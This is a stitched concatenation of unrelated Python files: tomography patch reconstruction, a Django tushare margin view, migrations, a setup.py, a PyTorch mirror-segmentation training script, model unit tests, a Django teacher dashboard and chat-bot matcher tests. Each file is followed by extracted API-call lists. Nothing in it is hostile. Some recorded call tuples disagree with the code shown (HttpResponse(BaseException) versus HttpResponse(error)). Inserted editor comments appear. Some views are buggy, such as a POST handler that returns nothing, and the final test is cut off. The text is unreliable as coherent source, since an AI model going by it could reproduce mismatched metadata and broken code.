print(f'\tTIME: local reconstruction - {t_rec/1000.0:.2f} secs')
print(f'\tTIME: local segmentation - {t_seg/1000.0:.2f} secs')
print(f'\tSTAT: total patches in neighborhood: {len(p_surf)}')
if TIMEIT:
return x_surf, p_surf, t_rec, t_seg
else:
return x_surf, p_surf
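# Editor's illustrative sketch (not part of the original module): a coarse-to-fine
# pass would typically chain guess_surface and process_patches roughly as below,
# assuming `projs`, `theta`, `center`, a binarized coarse volume `V_bin`, a trained
# segmenter `fe` and a `min_max` clipping range already exist:
#
#     p_surf, p_ones, p_zeros = guess_surface(V_bin, b=4, wd=32)
#     x_surf, p_surf = process_patches(projs, theta, center, fe, p_surf, min_max)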
| [
"cupy.zeros_like",
"numpy.clip",
"numpy.prod",
"tomo_encoders.misc.voxel_processing.TimerGPU",
"tomo_encoders.Grid",
"cupy.cuda.get_elapsed_time",
"cupy.repeat",
"numpy.sum",
"tomo_encoders.reconstruction.recon.recon_patches_3d",
"cupy.sqrt",
"cupy.meshgrid",
"numpy.std",
"cupy.cuda.Event",
"cupy.ceil"
]
| [((688, 724), 'cupy.meshgrid', 'cp.meshgrid', (['pts', 'pts'], {'indexing': '"""ij"""'}), "(pts, pts, indexing='ij')\n", (699, 724), True, 'import cupy as cp\n'), ((850, 882), 'cupy.repeat', 'cp.repeat', (['circ', 'shape_z'], {'axis': '(0)'}), '(circ, shape_z, axis=0)\n', (859, 882), True, 'import cupy as cp\n'), ((1276, 1312), 'cupy.meshgrid', 'cp.meshgrid', (['pts', 'pts'], {'indexing': '"""ij"""'}), "(pts, pts, indexing='ij')\n", (1287, 1312), True, 'import cupy as cp\n'), ((1438, 1470), 'cupy.repeat', 'cp.repeat', (['circ', 'shape_z'], {'axis': '(0)'}), '(circ, shape_z, axis=0)\n', (1447, 1470), True, 'import cupy as cp\n'), ((1604, 1614), 'tomo_encoders.misc.voxel_processing.TimerGPU', 'TimerGPU', ([], {}), '()\n', (1612, 1614), False, 'from tomo_encoders.misc.voxel_processing import modified_autocontrast, TimerGPU\n'), ((2085, 2101), 'cupy.zeros_like', 'cp.zeros_like', (['Y'], {}), '(Y)\n', (2098, 2101), True, 'import cupy as cp\n'), ((2446, 2474), 'tomo_encoders.Grid', 'Grid', (['V_bin.shape'], {'width': 'wdb'}), '(V_bin.shape, width=wdb)\n', (2450, 2474), False, 'from tomo_encoders import Grid\n'), ((3673, 3688), 'cupy.cuda.Event', 'cp.cuda.Event', ([], {}), '()\n', (3686, 3688), True, 'import cupy as cp\n'), ((3700, 3715), 'cupy.cuda.Event', 'cp.cuda.Event', ([], {}), '()\n', (3713, 3715), True, 'import cupy as cp\n'), ((3754, 3816), 'tomo_encoders.reconstruction.recon.recon_patches_3d', 'recon_patches_3d', (['projs', 'theta', 'center', 'p_surf'], {'apply_fbp': '(True)'}), '(projs, theta, center, p_surf, apply_fbp=True)\n', (3770, 3816), False, 'from tomo_encoders.reconstruction.recon import recon_patches_3d\n'), ((3911, 3952), 'cupy.cuda.get_elapsed_time', 'cp.cuda.get_elapsed_time', (['st_rec', 'end_rec'], {}), '(st_rec, end_rec)\n', (3935, 3952), True, 'import cupy as cp\n'), ((3965, 3980), 'cupy.cuda.Event', 'cp.cuda.Event', ([], {}), '()\n', (3978, 3980), True, 'import cupy as cp\n'), ((3992, 4007), 'cupy.cuda.Event', 'cp.cuda.Event', ([], {}), '()\n', (4005, 4007), True, 'import cupy as cp\n'), ((4043, 4068), 'numpy.clip', 'np.clip', (['x_surf', '*min_max'], {}), '(x_surf, *min_max)\n', (4050, 4068), True, 'import numpy as np\n'), ((4228, 4269), 'cupy.cuda.get_elapsed_time', 'cp.cuda.get_elapsed_time', (['st_seg', 'end_seg'], {}), '(st_seg, end_seg)\n', (4252, 4269), True, 'import cupy as cp\n'), ((2524, 2549), 'numpy.std', 'np.std', (['x'], {'axis': '(1, 2, 3)'}), '(x, axis=(1, 2, 3))\n', (2530, 2549), True, 'import numpy as np\n'), ((2878, 2905), 'numpy.prod', 'np.prod', (['p3d_surf.vol_shape'], {}), '(p3d_surf.vol_shape)\n', (2885, 2905), True, 'import numpy as np\n'), ((652, 674), 'cupy.ceil', 'cp.ceil', (['(shape_yx // 2)'], {}), '(shape_yx // 2)\n', (659, 674), True, 'import cupy as cp\n'), ((1240, 1262), 'cupy.ceil', 'cp.ceil', (['(shape_yx // 2)'], {}), '(shape_yx // 2)\n', (1247, 1262), True, 'import cupy as cp\n'), ((2572, 2597), 'numpy.sum', 'np.sum', (['x'], {'axis': '(1, 2, 3)'}), '(x, axis=(1, 2, 3))\n', (2578, 2597), True, 'import numpy as np\n'), ((2629, 2654), 'numpy.sum', 'np.sum', (['x'], {'axis': '(1, 2, 3)'}), '(x, axis=(1, 2, 3))\n', (2635, 2654), True, 'import numpy as np\n'), ((739, 765), 'cupy.sqrt', 'cp.sqrt', (['(yy ** 2 + xx ** 2)'], {}), '(yy ** 2 + xx ** 2)\n', (746, 765), True, 'import cupy as cp\n'), ((1327, 1353), 'cupy.sqrt', 'cp.sqrt', (['(yy ** 2 + xx ** 2)'], {}), '(yy ** 2 + xx ** 2)\n', (1334, 1353), True, 'import cupy as cp\n')] |
# Generated by Django 2.2.1 on 2019-06-22 11:03
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='SubscribeModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(db_index=True, max_length=255, unique=True, verbose_name='Email')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='Subscribe Time')),
],
options={
'verbose_name': 'Subscribe Email',
'verbose_name_plural': 'Subscribe Emails',
'abstract': False,
},
),
]
| [
"django.db.models.DateTimeField",
"django.db.models.EmailField",
"django.db.models.AutoField"
]
| [((310, 403), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (326, 403), False, 'from django.db import migrations, models\n'), ((428, 516), 'django.db.models.EmailField', 'models.EmailField', ([], {'db_index': '(True)', 'max_length': '(255)', 'unique': '(True)', 'verbose_name': '"""Email"""'}), "(db_index=True, max_length=255, unique=True, verbose_name=\n 'Email')\n", (445, 516), False, 'from django.db import migrations, models\n'), ((546, 616), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Subscribe Time"""'}), "(auto_now_add=True, verbose_name='Subscribe Time')\n", (566, 616), False, 'from django.db import migrations, models\n')] |
# -*- coding: UTF-8 -*-
import json
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
import tushare as ts
from .publiceClass import DateEncoder
@csrf_exempt
def sh_margins(request):
try:
        start = request.POST.get('start','')  # optional
        end = request.POST.get('end','')  # optional
data = ts.sh_margins(start,end)
res = {'columns':[
            '信用交易日期',          # margin trading date
            '本日融资余额(元)',      # today's margin financing balance (CNY)
            '本日融资买入额(元)',    # today's margin buying amount (CNY)
            '本日融券余量',          # today's securities lending volume
            '本日融券余量金额(元)',  # today's securities lending balance (CNY)
            '本日融券卖出量',        # today's securities lending sell volume
            '本日融资融券余额(元)'   # today's total margin balance (CNY)
],'data':json.loads(json.dumps(data.values,cls=DateEncoder))}
    except BaseException as error:
        # Return the caught error rather than the BaseException class itself.
        return HttpResponse(error)
else:
return HttpResponse(json.dumps(res),content_type="application/json")
| [
"django.http.HttpResponse",
"json.dumps",
"tushare.sh_margins"
]
| [((341, 366), 'tushare.sh_margins', 'ts.sh_margins', (['start', 'end'], {}), '(start, end)\n', (354, 366), True, 'import tushare as ts\n'), ((676, 703), 'django.http.HttpResponse', 'HttpResponse', (['BaseException'], {}), '(BaseException)\n', (688, 703), False, 'from django.http import HttpResponse\n'), ((743, 758), 'json.dumps', 'json.dumps', (['res'], {}), '(res)\n', (753, 758), False, 'import json\n'), ((592, 632), 'json.dumps', 'json.dumps', (['data.values'], {'cls': 'DateEncoder'}), '(data.values, cls=DateEncoder)\n', (602, 632), False, 'import json\n')] |
# Generated by Django 3.1.4 on 2021-05-05 21:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Main', '0071_auto_20210506_0004'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='chooseColor',
),
migrations.RemoveField(
model_name='product',
name='chooseSize',
),
]
| [
"django.db.migrations.RemoveField"
]
| [((224, 288), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""product"""', 'name': '"""chooseColor"""'}), "(model_name='product', name='chooseColor')\n", (246, 288), False, 'from django.db import migrations\n'), ((333, 396), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""product"""', 'name': '"""chooseSize"""'}), "(model_name='product', name='chooseSize')\n", (355, 396), False, 'from django.db import migrations\n')] |
import json
import setuptools
with open("template/README.md", "r") as fh:
long_description = fh.read()
with open('requirements.txt') as fr:
requirements = fr.read().strip().split('\n')
with open('metadata.json') as fr:
metadata = json.load(fr)
setuptools.setup(
name="", # Name of the repository
version="0.0.1",
author=metadata.get("author", ""),
author_email=metadata.get("author_email", ""),
description=metadata.get("description", ""),
long_description=long_description,
long_description_content_type="text/markdown",
url="", # Repository URL or externally maintained page
packages=setuptools.find_packages(),
python_requires='>=3.6',
install_requires=requirements,
)
| [
"json.load",
"setuptools.find_packages"
]
| [((245, 258), 'json.load', 'json.load', (['fr'], {}), '(fr)\n', (254, 258), False, 'import json\n'), ((640, 666), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (664, 666), False, 'import setuptools\n')] |
"""
@Time : 201/21/19 10:41
@Author : TaylorMei
@Email : <EMAIL>
@Project : iccv
@File : train_base3.py
@Function:
"""
import datetime
import os
import torch
from torch import nn
from torch import optim
from torch.autograd import Variable
from torch.backends import cudnn
from torch.utils.data import DataLoader
from torchvision import transforms
from tensorboardX import SummaryWriter
from tqdm import tqdm
import joint_transforms
from config import msd_training_root
from config import backbone_path
from dataset import ImageFolder
from misc import AvgMeter, check_mkdir
from model.base3 import BASE3
import loss as L
cudnn.benchmark = True
device_ids = [2]
ckpt_path = './ckpt'
exp_name = 'BASE3'
args = {
'epoch_num': 100,
'train_batch_size': 14,
'last_epoch': 0,
'lr': 5e-3,
'lr_decay': 0.9,
'weight_decay': 5e-4,
'momentum': 0.9,
'snapshot': '',
'scale': 384,
'save_point': [60, 80, 90],
'add_graph': True,
'poly_train': True,
'optimizer': 'SGD'
}
# Path.
check_mkdir(ckpt_path)
check_mkdir(os.path.join(ckpt_path, exp_name))
vis_path = os.path.join(ckpt_path, exp_name, 'log')
check_mkdir(vis_path)
log_path = os.path.join(ckpt_path, exp_name, str(datetime.datetime.now()) + '.txt')
writer = SummaryWriter(log_dir=vis_path, comment=exp_name)
# Transform Data.
joint_transform = joint_transforms.Compose([
joint_transforms.RandomRotate(),
joint_transforms.Resize((args['scale'], args['scale']))
])
img_transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # maybe can optimized.
])
target_transform = transforms.ToTensor()
# Prepare Data Set.
train_set = ImageFolder(msd_training_root, joint_transform, img_transform, target_transform)
print("Train set: {}".format(train_set.__len__()))
train_loader = DataLoader(train_set, batch_size=args['train_batch_size'], num_workers=0, shuffle=True)
def main():
print(args)
print(exp_name)
net = BASE3(backbone_path).cuda(device_ids[0]).train()
if args['add_graph']:
writer.add_graph(net, input_to_model=torch.rand(
args['train_batch_size'], 3, args['scale'], args['scale']).cuda(device_ids[0]))
if args['optimizer'] == 'Adam':
print("Adam")
optimizer = optim.Adam([
{'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'],
'lr': 2 * args['lr']},
{'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'],
'lr': 1 * args['lr'], 'weight_decay': args['weight_decay']}
])
else:
print("SGD")
optimizer = optim.SGD([
{'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'],
'lr': 2 * args['lr']},
{'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'],
'lr': 1 * args['lr'], 'weight_decay': args['weight_decay']}
], momentum=args['momentum'])
if len(args['snapshot']) > 0:
print('Training Resumes From \'%s\'' % args['snapshot'])
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
net = nn.DataParallel(net, device_ids=device_ids)
print("Using {} GPU(s) to Train.".format(len(device_ids)))
open(log_path, 'w').write(str(args) + '\n\n')
train(net, optimizer)
writer.close()
def train(net, optimizer):
curr_iter = 1
for epoch in range(args['last_epoch'] + 1, args['last_epoch'] + 1 + args['epoch_num']):
loss_4_record, loss_3_record, loss_2_record, loss_1_record, \
loss_f_record, loss_record = AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter()
train_iterator = tqdm(train_loader, total=len(train_loader))
for data in train_iterator:
if args['poly_train']:
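                # Polynomial ("poly") LR decay: scale the base LR by
                # (1 - curr_iter / max_iter) ** lr_decay at every iteration.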
base_lr = args['lr'] * (1 - float(curr_iter) / (args['epoch_num'] * len(train_loader))) ** args[
'lr_decay']
optimizer.param_groups[0]['lr'] = 2 * base_lr
optimizer.param_groups[1]['lr'] = 1 * base_lr
inputs, labels = data
batch_size = inputs.size(0)
inputs = Variable(inputs).cuda(device_ids[0])
labels = Variable(labels).cuda(device_ids[0])
optimizer.zero_grad()
predict_4, predict_3, predict_2, predict_1, predict_f = net(inputs)
loss_4 = L.lovasz_hinge(predict_4, labels)
loss_3 = L.lovasz_hinge(predict_3, labels)
loss_2 = L.lovasz_hinge(predict_2, labels)
loss_1 = L.lovasz_hinge(predict_1, labels)
loss_f = L.lovasz_hinge(predict_f, labels)
loss = loss_4 + loss_3 + loss_2 + loss_1 + loss_f
loss.backward()
optimizer.step()
loss_record.update(loss.data, batch_size)
loss_4_record.update(loss_4.data, batch_size)
loss_3_record.update(loss_3.data, batch_size)
loss_2_record.update(loss_2.data, batch_size)
loss_1_record.update(loss_1.data, batch_size)
loss_f_record.update(loss_f.data, batch_size)
if curr_iter % 50 == 0:
writer.add_scalar('loss', loss, curr_iter)
writer.add_scalar('loss_4', loss_4, curr_iter)
writer.add_scalar('loss_3', loss_3, curr_iter)
writer.add_scalar('loss_2', loss_2, curr_iter)
writer.add_scalar('loss_1', loss_1, curr_iter)
writer.add_scalar('loss_f', loss_f, curr_iter)
log = '[%3d], [%6d], [%.6f], [%.5f], [L4: %.5f], [L3: %.5f], [L2: %.5f], [L1: %.5f], [Lf: %.5f]' % \
(epoch, curr_iter, base_lr, loss_record.avg, loss_4_record.avg, loss_3_record.avg, loss_2_record.avg,
loss_1_record.avg, loss_f_record.avg)
train_iterator.set_description(log)
open(log_path, 'a').write(log + '\n')
curr_iter += 1
if epoch in args['save_point']:
net.cpu()
torch.save(net.module.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % epoch))
net.cuda(device_ids[0])
if epoch >= args['epoch_num']:
net.cpu()
torch.save(net.module.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % epoch))
print("Optimization Have Done!")
return
if __name__ == '__main__':
main()
| [
"dataset.ImageFolder",
"joint_transforms.RandomRotate",
"loss.lovasz_hinge",
"tensorboardX.SummaryWriter",
"misc.AvgMeter",
"model.base3.BASE3",
"os.path.join",
"torch.nn.DataParallel",
"joint_transforms.Resize",
"datetime.datetime.now",
"torchvision.transforms.Normalize",
"torch.utils.data.DataLoader",
"misc.check_mkdir",
"torchvision.transforms.ToTensor",
"torch.autograd.Variable",
"torch.rand"
]
| [((1041, 1063), 'misc.check_mkdir', 'check_mkdir', (['ckpt_path'], {}), '(ckpt_path)\n', (1052, 1063), False, 'from misc import AvgMeter, check_mkdir\n'), ((1122, 1162), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name', '"""log"""'], {}), "(ckpt_path, exp_name, 'log')\n", (1134, 1162), False, 'import os\n'), ((1163, 1184), 'misc.check_mkdir', 'check_mkdir', (['vis_path'], {}), '(vis_path)\n', (1174, 1184), False, 'from misc import AvgMeter, check_mkdir\n'), ((1278, 1327), 'tensorboardX.SummaryWriter', 'SummaryWriter', ([], {'log_dir': 'vis_path', 'comment': 'exp_name'}), '(log_dir=vis_path, comment=exp_name)\n', (1291, 1327), False, 'from tensorboardX import SummaryWriter\n'), ((1673, 1694), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1692, 1694), False, 'from torchvision import transforms\n'), ((1728, 1813), 'dataset.ImageFolder', 'ImageFolder', (['msd_training_root', 'joint_transform', 'img_transform', 'target_transform'], {}), '(msd_training_root, joint_transform, img_transform, target_transform\n )\n', (1739, 1813), False, 'from dataset import ImageFolder\n'), ((1875, 1966), 'torch.utils.data.DataLoader', 'DataLoader', (['train_set'], {'batch_size': "args['train_batch_size']", 'num_workers': '(0)', 'shuffle': '(True)'}), "(train_set, batch_size=args['train_batch_size'], num_workers=0,\n shuffle=True)\n", (1885, 1966), False, 'from torch.utils.data import DataLoader\n'), ((1076, 1109), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name'], {}), '(ckpt_path, exp_name)\n', (1088, 1109), False, 'import os\n'), ((3267, 3310), 'torch.nn.DataParallel', 'nn.DataParallel', (['net'], {'device_ids': 'device_ids'}), '(net, device_ids=device_ids)\n', (3282, 3310), False, 'from torch import nn\n'), ((1396, 1427), 'joint_transforms.RandomRotate', 'joint_transforms.RandomRotate', ([], {}), '()\n', (1425, 1427), False, 'import joint_transforms\n'), ((1433, 1488), 'joint_transforms.Resize', 'joint_transforms.Resize', (["(args['scale'], args['scale'])"], {}), "((args['scale'], args['scale']))\n", (1456, 1488), False, 'import joint_transforms\n'), ((1533, 1554), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1552, 1554), False, 'from torchvision import transforms\n'), ((1560, 1626), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['[0.485, 0.456, 0.406]', '[0.229, 0.224, 0.225]'], {}), '([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n', (1580, 1626), False, 'from torchvision import transforms\n'), ((1234, 1257), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1255, 1257), False, 'import datetime\n'), ((3717, 3727), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3725, 3727), False, 'from misc import AvgMeter, check_mkdir\n'), ((3729, 3739), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3737, 3739), False, 'from misc import AvgMeter, check_mkdir\n'), ((3741, 3751), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3749, 3751), False, 'from misc import AvgMeter, check_mkdir\n'), ((3753, 3763), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3761, 3763), False, 'from misc import AvgMeter, check_mkdir\n'), ((3765, 3775), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3773, 3775), False, 'from misc import AvgMeter, check_mkdir\n'), ((3777, 3787), 'misc.AvgMeter', 'AvgMeter', ([], {}), '()\n', (3785, 3787), False, 'from misc import AvgMeter, check_mkdir\n'), ((4527, 4560), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_4', 'labels'], {}), '(predict_4, labels)\n', (4541, 4560), True, 'import loss 
as L\n'), ((4582, 4615), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_3', 'labels'], {}), '(predict_3, labels)\n', (4596, 4615), True, 'import loss as L\n'), ((4637, 4670), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_2', 'labels'], {}), '(predict_2, labels)\n', (4651, 4670), True, 'import loss as L\n'), ((4692, 4725), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_1', 'labels'], {}), '(predict_1, labels)\n', (4706, 4725), True, 'import loss as L\n'), ((4747, 4780), 'loss.lovasz_hinge', 'L.lovasz_hinge', (['predict_f', 'labels'], {}), '(predict_f, labels)\n', (4761, 4780), True, 'import loss as L\n'), ((3193, 3253), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name', "(args['snapshot'] + '.pth')"], {}), "(ckpt_path, exp_name, args['snapshot'] + '.pth')\n", (3205, 3253), False, 'import os\n'), ((6187, 6238), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name', "('%d.pth' % epoch)"], {}), "(ckpt_path, exp_name, '%d.pth' % epoch)\n", (6199, 6238), False, 'import os\n'), ((6386, 6437), 'os.path.join', 'os.path.join', (['ckpt_path', 'exp_name', "('%d.pth' % epoch)"], {}), "(ckpt_path, exp_name, '%d.pth' % epoch)\n", (6398, 6437), False, 'import os\n'), ((2024, 2044), 'model.base3.BASE3', 'BASE3', (['backbone_path'], {}), '(backbone_path)\n', (2029, 2044), False, 'from model.base3 import BASE3\n'), ((4294, 4310), 'torch.autograd.Variable', 'Variable', (['inputs'], {}), '(inputs)\n', (4302, 4310), False, 'from torch.autograd import Variable\n'), ((4352, 4368), 'torch.autograd.Variable', 'Variable', (['labels'], {}), '(labels)\n', (4360, 4368), False, 'from torch.autograd import Variable\n'), ((2144, 2213), 'torch.rand', 'torch.rand', (["args['train_batch_size']", '(3)', "args['scale']", "args['scale']"], {}), "(args['train_batch_size'], 3, args['scale'], args['scale'])\n", (2154, 2213), False, 'import torch\n')] |
import unittest
from app.models import Comment, Pitch
from app import db
class TestPitchComment(unittest.TestCase):
def setUp(self):
self.new_pitch = Pitch(post = "doit", category='Quotes')
self.new_comment = Comment(comment = "good comment", pitch=self.new_pitch)
def test_instance(self):
self.assertTrue(isinstance(self.new_comment,Comment))
def test_check_instance_variables(self):
        self.assertEqual(self.new_comment.comment, "good comment")
        self.assertEqual(self.new_comment.pitch, self.new_pitch, 'do it') | [
"app.models.Comment",
"app.models.Pitch"
]
| [((164, 201), 'app.models.Pitch', 'Pitch', ([], {'post': '"""doit"""', 'category': '"""Quotes"""'}), "(post='doit', category='Quotes')\n", (169, 201), False, 'from app.models import Comment, Pitch\n'), ((231, 284), 'app.models.Comment', 'Comment', ([], {'comment': '"""good comment"""', 'pitch': 'self.new_pitch'}), "(comment='good comment', pitch=self.new_pitch)\n", (238, 284), False, 'from app.models import Comment, Pitch\n')] |
from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from django.template import loader
from django.db import connection
from django.http import HttpResponseRedirect
import datetime
from django.http import JsonResponse
from administrator.models import Course, CourseTeacher, CourseStudent, Student
from django.core.exceptions import PermissionDenied
def teacher_only(function):
#"""Limit view to teacher only."""
def _inner(request, *args, **kwargs):
if not request.user.is_staff == False | request.user.is_superuser:
raise PermissionDenied
return function(request, *args, **kwargs)
return _inner
@login_required(login_url = '/users')
@teacher_only
def home(request):
current_user = request.user.id
teacher_current_courses = Course.objects.select_related().raw('SELECT * '
'FROM course_teachers as CT, courses as C '
'WHERE CT.teachers_id = %s AND C.course_id = CT.course_id AND C.is_complete = 0 ', [current_user])
currentdate = datetime.datetime.today().strftime('%Y-%m-%d')
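    # Upcoming class dates, one row per course taught by the logged-in teacher.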
with connection.cursor() as cursor:
cursor.execute('SELECT CL.course_id, CL.date '
'FROM classes as CL, course_teachers as CT '
'WHERE CT.teachers_id = %s AND CL.date >= %s '
'AND CT.course_id = CL.course_id '
'GROUP BY CL.course_id ', [current_user, currentdate])
next_class_date = cursor.fetchall()
with connection.cursor() as cursor:
cursor.execute('SELECT CS.course_id, COUNT(CS.students_id) '
'FROM course_teachers as CT, course_students as CS '
'WHERE CT.teachers_id = %s AND CT.course_id = CS.course_id '
'GROUP BY CS.course_id ', [current_user])
teacher_student_count = cursor.fetchall()
with connection.cursor() as cursor:
cursor.execute('SELECT C.course_id, C.notes '
'FROM course_teachers as CT, courses as C '
'WHERE CT.teachers_id = %s AND C.course_id = CT.course_id '
'GROUP BY CT.course_id ', [current_user])
teacher_course_notes = cursor.fetchall()
template = loader.get_template('teacher/dashboard.html')
context = {
'teacher_current_courses': teacher_current_courses,
'teacher_student_count': teacher_student_count,
'next_class_date': next_class_date,
'teacher_course_notes': teacher_course_notes
}
# Render the template to the user
return HttpResponse(template.render(context, request))
@csrf_exempt
def update_course_notes(request):
# Get the student name that was passed from the web page
courseNotes = request.POST.get('courseNotes')
courseId = request.POST.get('courseId')
# Create a cursor to execute raw SQL queries.
with connection.cursor() as cursor:
cursor.execute('UPDATE courses '
'SET notes = %s '
'WHERE course_id = %s', [courseNotes, courseId])
# Render the response to the user
| [
"django.db.connection.cursor",
"django.contrib.auth.decorators.login_required",
"datetime.datetime.today",
"django.template.loader.get_template",
"administrator.models.Course.objects.select_related"
]
| [((776, 810), 'django.contrib.auth.decorators.login_required', 'login_required', ([], {'login_url': '"""/users"""'}), "(login_url='/users')\n", (790, 810), False, 'from django.contrib.auth.decorators import login_required\n'), ((2666, 2711), 'django.template.loader.get_template', 'loader.get_template', (['"""teacher/dashboard.html"""'], {}), "('teacher/dashboard.html')\n", (2685, 2711), False, 'from django.template import loader\n'), ((1306, 1325), 'django.db.connection.cursor', 'connection.cursor', ([], {}), '()\n', (1323, 1325), False, 'from django.db import connection\n'), ((1789, 1808), 'django.db.connection.cursor', 'connection.cursor', ([], {}), '()\n', (1806, 1808), False, 'from django.db import connection\n'), ((2197, 2216), 'django.db.connection.cursor', 'connection.cursor', ([], {}), '()\n', (2214, 2216), False, 'from django.db import connection\n'), ((3355, 3374), 'django.db.connection.cursor', 'connection.cursor', ([], {}), '()\n', (3372, 3374), False, 'from django.db import connection\n'), ((919, 950), 'administrator.models.Course.objects.select_related', 'Course.objects.select_related', ([], {}), '()\n', (948, 950), False, 'from administrator.models import Course, CourseTeacher, CourseStudent, Student\n'), ((1245, 1270), 'datetime.datetime.today', 'datetime.datetime.today', ([], {}), '()\n', (1268, 1270), False, 'import datetime\n')] |
import logging
import pytest
import re
from . import text
from ... import matchers
from ...utils import answer, SimpleTrigger
logger = logging.getLogger(__name__)
@pytest.mark.asyncio
async def test_should_run_story_on_equal_message():
trigger = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on('hi there!')
def one_story():
@story.part()
def then(ctx):
trigger.passed()
await talk.pure_text('hi there!')
assert trigger.is_triggered
@pytest.mark.asyncio
async def test_should_not_run_story_on_non_equal_message():
trigger = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on('hi there!')
def one_story():
@story.part()
def then(ctx):
trigger.passed()
await talk.pure_text('buy!')
assert not trigger.is_triggered
@pytest.mark.asyncio
async def test_should_catch_any_text_message():
trigger = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Any())
def one_story():
@story.part()
def then(ctx):
trigger.passed()
await talk.pure_text('hi there!')
assert trigger.is_triggered
@pytest.mark.asyncio
async def test_should_ignore_any_non_text_message():
trigger = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Any())
def one_story():
@story.part()
def then(ctx):
trigger.passed()
await talk.location('some where')
assert not trigger.is_triggered
def test_serialize_text_any():
m_old = text.Any()
m_new = matchers.deserialize(matchers.serialize(m_old))
assert isinstance(m_new, text.Any)
@pytest.mark.asyncio
async def test_should_catch_equal_text_message():
trigger_hi_there = SimpleTrigger()
trigger_see_you = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Equal('hi there!'))
def first_story():
@story.part()
def then(ctx):
trigger_hi_there.passed()
@story.on(text.Equal('see you!'))
def second_story():
@story.part()
def then(ctx):
trigger_see_you.passed()
await talk.pure_text('see you!')
assert not trigger_hi_there.is_triggered
assert trigger_see_you.is_triggered
def test_equal_handle_should_create_right_type():
assert isinstance(text.Equal.handle(''), text.Equal)
def test_serialize_text_equal():
m_old = text.Equal('hats off')
m_new = matchers.deserialize(matchers.serialize(m_old))
assert isinstance(m_new, text.Equal)
assert m_new.test_string == 'hats off'
@pytest.mark.asyncio
async def test_should_catch_equal_text_message_case_in_sensitive():
trigger_hi_there = SimpleTrigger()
trigger_see_you = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.EqualCaseIgnore('hi there!'))
def first_story():
@story.part()
def then(ctx):
trigger_hi_there.passed()
@story.on(text.EqualCaseIgnore('see you!'))
def second_story():
@story.part()
def then(ctx):
trigger_see_you.passed()
await talk.pure_text('See You!')
assert not trigger_hi_there.is_triggered
assert trigger_see_you.is_triggered
def test_serialize_text_equal_case_ignore():
m_old = text.EqualCaseIgnore('hats off')
m_new = matchers.deserialize(matchers.serialize(m_old))
assert isinstance(m_new, text.EqualCaseIgnore)
assert m_new.test_string == 'hats off'
@pytest.mark.asyncio
async def test_should_catch_text_message_that_match_regex():
trigger_buy = SimpleTrigger()
trigger_sell = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Match('buy (.*)btc'))
def one_story():
@story.part()
def then(ctx):
trigger_buy.receive(text.get_text(ctx)['matches'][0])
@story.on(text.Match('sell (.*)btc'))
def another_story():
@story.part()
def then(ctx):
trigger_sell.receive(text.get_text(ctx)['matches'][0])
await talk.pure_text('buy 700btc')
await talk.pure_text('sell 600btc')
assert trigger_buy.result() == '700'
assert trigger_sell.result() == '600'
@pytest.mark.asyncio
async def test_should_catch_text_message_that_match_regex_with_flags():
trigger_destination = SimpleTrigger()
with answer.Talk() as talk:
story = talk.story
@story.on(text.Match('going to (.*)', re.IGNORECASE))
def one_story():
@story.part()
def then(ctx):
logger.debug('ctx')
logger.debug(ctx)
trigger_destination.receive(text.get_text(ctx)['matches'][0])
await talk.pure_text('Going to Pripyat')
assert trigger_destination.result() == 'Pripyat'
@pytest.mark.asyncio
async def test_should_not_fail_on_empty_message():
with answer.Talk() as talk:
